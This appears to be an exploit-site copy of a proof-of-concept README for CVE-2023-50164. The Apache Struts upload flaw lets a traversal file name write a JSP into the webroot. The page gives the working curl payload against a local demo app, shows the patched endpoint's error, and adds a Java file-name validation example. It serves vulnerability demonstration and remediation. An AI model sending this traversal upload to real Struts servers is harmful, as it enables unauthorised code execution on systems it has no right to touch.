## https://sploitus.com/exploit?id=012A2C8A-0673-5AF7-9081-06F57EDBBDB5
This is a Proof of Concept (PoC) for [CVE-2023-50164](https://nvd.nist.gov/vuln/detail/CVE-2023-50164), a path
traversal vulnerability in the file upload handling of [struts-core](https://struts.apache.org/) that lets an attacker
control where an uploaded file is written, which can lead to Remote Code Execution (RCE).
To remediate the issue, upgrade to Struts 2.5.33 or Struts 6.3.0.2 or later.
This repo builds off the excellent work of
[Henrik Plate](https://github.com/henrikplate) found [here](https://github.com/henrikplate/struts-demo).
## Run the PoC
There are two maven profiles in this project: `vuln` and `no-vuln`. `vuln` is the default.
To run _with the RCE vuln_, execute the following:
```
mvn clean jetty:run -P vuln
```
To run _without the RCE vuln_, execute the following:
```
mvn clean jetty:run -P no-vuln
```
The only difference between the two profiles is the `struts-core` version: `vuln` uses `6.3.0.1`
(which has the path traversal vulnerability) and `no-vuln` uses `6.3.0.2` (which does not).
## Exploit the Vuln
While running the `vuln` profile described above, execute the following. Note the capitalised `Upload` form field
paired with the lower-case `uploadFileName` parameter: this parameter-name casing mismatch is what lets the
attacker-supplied `uploadFileName` (including its `../`) override the file name Struts derives from the multipart part.
```
curl \
http://localhost:9999/struts-vuln-poc/upload.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"
```
You'll be able to see the file `rogue.jsp` in the `src/main/webapp` folder and you can browse to it at:
`http://localhost:9999/struts-vuln-poc/rogue.jsp` (you'll see a **Ya been PWNED!** message). The dropped JSP is
served because `jetty:run` serves the webapp straight from `src/main/webapp` and compiles the new page on first request.
The project also includes a code-level fix in the action itself that works with the older Struts versions, _but_
upgrading your version of Struts is still highly advised.
To exercise the code fix, execute the following:
```
curl \
http://localhost:9999/struts-vuln-poc/upload-no-vuln.action \
-F "Upload=@./payload/rogue.jsp" \
-F "uploadFileName=../src/main/webapp/rogue.jsp"
```
You'll see an error message: `Attempted path traversal attack`
**NOTE**: If you use the `no-vuln` profile, you **won't** get an error message from the `/upload-no-vuln`
endpoint, even if you use a relative path like `../src/main/webapp/rogue.jsp`, because the patched version of Struts
strips relative path references from the submitted file name before the action ever sees it, so the action's own
check never triggers.
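The fixed endpoint above rejects the request with `Attempted path traversal attack`. The following is an added
example of the kind of check an action can apply to the attacker-controlled `uploadFileName` before writing the part
to disk; it is illustration code, not the repo's `upload-no-vuln` action or Struts' own code, and the upload directory
name, class name and messages are assumptions. Two checks are combined: the name must be a bare file name (no
separators, no `.`/`..`), and the resolved path must still sit inside the upload directory. The second check alone would
accept a name like `a/../b.jsp`, so the first one is the one that does most of the work.

```java
import java.nio.file.Path;
import java.nio.file.Paths;

/**
 * Added example (not the PoC repo's code): validating an attacker-controlled upload file name
 * before it is used to build a destination path. The upload directory is an assumption.
 */
public class SafeUploadName {

    /** Accept only a bare file name: no path separators, no "." or "..", no NUL bytes. */
    static boolean isBareFileName(String name) {
        if (name == null || name.isEmpty()) {
            return false;
        }
        if (name.contains("/") || name.contains("\\") || name.indexOf('\0') >= 0) {
            return false;
        }
        return !name.equals(".") && !name.equals("..");
    }

    /**
     * Resolve the submitted name under uploadDir and confirm the normalised result is still
     * inside it. Throws for anything that would escape, mirroring the error message the PoC's
     * fixed endpoint returns.
     */
    static Path resolveInside(Path uploadDir, String name) {
        Path base = uploadDir.toAbsolutePath().normalize();
        if (!isBareFileName(name)) {
            throw new IllegalArgumentException("Attempted path traversal attack: " + name);
        }
        Path target = base.resolve(name).normalize();
        // Defence in depth: even a bare name must land directly under the upload directory.
        if (!target.startsWith(base) || target.getParent() == null || !target.getParent().equals(base)) {
            throw new IllegalArgumentException("Attempted path traversal attack: " + name);
        }
        return target;
    }

    public static void main(String[] args) {
        Path uploadDir = Paths.get("target", "uploads"); // assumed upload directory
        // Constructed inputs: the PoC's traversal name, a sneaky relative form, and a harmless name.
        String[] names = { "../src/main/webapp/rogue.jsp", "a/../b.jsp", "report.txt" };
        for (String n : names) {
            try {
                Path p = resolveInside(uploadDir, n);
                System.out.println("accepted: " + n + " -> " + p);
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + e.getMessage());
            }
        }
    }
}
```

Run it with `javac SafeUploadName.java && java SafeUploadName`: the first two names are rejected and only `report.txt`
resolves under `target/uploads`. In a Struts action the same check belongs in `execute()` (or a validator) on the value
delivered to `setUploadFileName`, before any file I/O.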